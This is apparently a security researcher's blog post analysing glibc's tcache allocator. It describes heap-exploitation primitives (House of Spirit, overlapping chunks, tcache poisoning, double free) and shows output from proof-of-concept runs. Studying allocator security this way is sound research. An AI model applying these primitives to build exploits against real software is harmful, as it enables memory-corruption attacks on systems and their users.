thread local caching in glibc malloc
08 Jul 2017Welcome to the fifth episode of the ptmalloc fanzine, in which we look at thread local caching, a recent addition to glibc malloc.
TLDR
This episode consists of:
- an overview of the changes brought by per-thread caching
- an exploration of how tcaching affects some old techniques
- the House of Spirit: fewer and looser prerequisites
- creating overlapping chunks via size corruption of allocated chunks later passed into free
- tcache poisoning: forcing malloc to return completely arbitrary chunks in a similar fashion to fastbin poisoning with fewer prereqs.
- new possibilities
All analysis was done on this state of the glibc tree on Ubuntu 16.04 (x86-64).
Overview
The patch (see commit) offers significant performance gains (see benchmarks) by creating per-thread caches for chunks up to a certain size (practically below largebin sizes). Modifying these bins requires no locking, hence the speed improvements. It’s important to note that there are no distros using it currrently, since it will be only released as part of glibc 2.26 (scheduled in August), so things may change before it sees widespread use.
New structures
There are 2 new structures of interest, tcache_entry and tcache_perthread_struct. Both are rather simple, see them below. There are 64 singly-linked bins per thread by default, for chunksizes from 24 to 1032 (12 to 516 on x86) bytes, in 16 (8) byte increments. A single tcache bin contains at most 7 chunks by default.
tcache usage
Chunks can end up in the thread caches multiple ways:
- upon free: before the fastbin code in _int_free, if the chunk has an appropriate size and the corresponding bin isn’t full
- upon malloc, there are 3 places where caches are filled
- if a fast chunk is returned, the other chunks from the corresponding fastbin are used to fill the appropriate tcache bin.
- the same is done if a small chunk is returned by malloc.
- in the binning code, exact size matches are first put in the tcache instead of returning immediately.
Chunks are taken from the tcache:
- in
__libc_malloc
, before _int_malloc. - after the binning code, if at least one exact match was found.
- there can also be a limit on the number chunks that are put in the tcache in a run of the binning code. If that’s reached, the last one found is returned. However, this is unlimited by default.
Some observations:
- the tcache fill code in the fast path of malloc will reverse the order of the chunks.
- cached chunks won’t be coalesced
2.1 neither on free of neighboring chunks
2.2 nor with top when they are freed
An offense-focused analysis
The tcache handling code is very early in both free and malloc, as it should be, meaning that most of the free/malloc code is bypassed for non-large chunksizes until the corresponding tcache bins are full. This is by design but has some ramifications. As a direct result, most integrity checks are bypassed. In _int_free
, a corrupted chunk only has to pass the alignment and wrapping checks before being cached. The caching happens in __libc_malloc on the malloc side.
The House of Spirit
Consider what is needed to make the caching code accept a region as a chunk in the beginning of _int_free. A fake size value is enough that satisfies the following :
- it’s at a
2*SIZE_SZ
aligned address - its value is between
MINSIZE
and the maximum cached chunksize (1032/516 bytes). - on x64 it also mustn’t have its 4th LSB set.
This makes the House of Spirit much more powerful than it used to be: there are no nextsize checks and now it works for smallbin sizes, too. The tcache_house_of_spirit.c example shows this in practice by building a fake chunk with a smallbin size and an invalid nextchunk on the stack, passing it to free and getting it back from malloc.
tukan@farm:~/work/libc/build/b2$ ./testrun.sh ../../../ptmalloc-fanzine/05-tcache/tcache_house_of_spirit
This example showcases how the House of Spirit became more powerful after the tcache patch
Filling space at and after the fake chunk with invalid data
Building fake chunk on the stack at 0x7fff781b50e0
Passed chunk to free, let's make an allocation for the fake size
malloc(0x100) returned: 0x7fff781b50f0
Overlapping chunks
Creating overlapping chunks via the binning code in _int_malloc
by corrupting the size of a freed chunk has already been rather easy but the caching mechanisms brings this possibility to the allocated chunk
/_int_free
side, too. Any size that passes the checks discussed above will result in the chunk being placed into the tcache bin corresponding to the fake size. The overlapping_chunks_by_caching.c shows this by enlarging a chunk.
tukan@farm:~/work/libc/build/b2$ ./testrun.sh ../../../ptmalloc-fanzine/05-tcache/overlapping_chunks_by_caching
This example showcases the possibility to create overlapping chunks via the tcaching code in _int_free
Allocated victim chunk with requested size 0x48 at 0x560e374c4670
Allocated sentry element after victim (not strictly necessary): 0x560e374c46c0
Emulating corruption of the victim's size to 0x110
Freed victim chunk to put it in a different tcache bin
Requested a chunk of 0x100 bytes, it is at: 0x560e374c4670
tcache poisoning
Bins in a tcache behave rather similar to fastbins. Below is the code for tcache_get
, responsible for removing a chunk from a tcache bin. Corrupting the next
pointer in a tcache_entry
yields the ability to return completely arbitrary chunks. Compared to the requirements for fastbin poisoning (a size_t
value with the same fastbin_index
as the poisoned fastbin to act as the size of the fake chunk), this is very attacker-friendly.
The tcache_poisoning.c example shows this in practice.
tukan@farm:~/work/libc/build/b2$ ./testrun.sh ../../../ptmalloc-fanzine/05-tcache/tcache_poisoning
This example showcases tcache poisoning by forcing malloc to return an arbitrary chunk after the corruption of a tcache_entry
Our target is a stack region at 0x7fff0faa62c0
Allocated victim chunk with requested size 0x48 at 0x55f6a8fb9670
Freed victim chunk to put it in a tcache bin
Emulating corruption of the next ptr of victim (while also corrupting its size for good measure)
Now we need to make two requests for the appropriate size so that malloc returns a chunk overlapping our target
The first malloc(0x48) returned 0x55f6a8fb9670, the second one: 0x7fff0faa62c0
Making a tcache bin circular by a double free is also a bit simpler than fastbin duplication because there is no double free check against the first member of the bin upon free.
I consider these the more serious issues, what follows is a theoretical treatment of a couple of other primitives.
Smallbin cache filling bck write
The cache filling code of the smallbin path in _int_malloc
mentioned previously traverses the smallbin corresponding to the requested size and places chunks into the corresponding tcache bin (until the smallbin is empty or the tcache bin is full). It does the same unlinking as a couple of lines above to remove the victim chunk from the smallbin but lacks the bck->fd != victim
check. This means that
- the House of Lore could be made more practical again (though there are much more useful techniques now)
- an uncontrolled write similar to the unsorted bck write could be achieved
tcache_perthread_structs as corruption targets
The tcache_perthread_struct
of a thread is allocated via _int_malloc
, so it resides on the heap. The counts
member is mostly uninteresting but corrupting the entries
array would make it possible to do the previous tcache poisoning in fewer steps. Since allocation of the structure happens before any other allocation, the viability of this approach will highly depend on the target:
- the type of corruption
- once the number of threads reach the arena number limit, arena sharing between threads might make these structures more interleaved with other data.
Conclusion
Per-thread caching is an interesting addition to glibc malloc providing significant performance benefits. However, it also seems to be a few steps backwards regarding the security posture of the allocator and shows that striking a good balance between performance and security is hard.
Special thanks to gym again for the rigorous proofreading.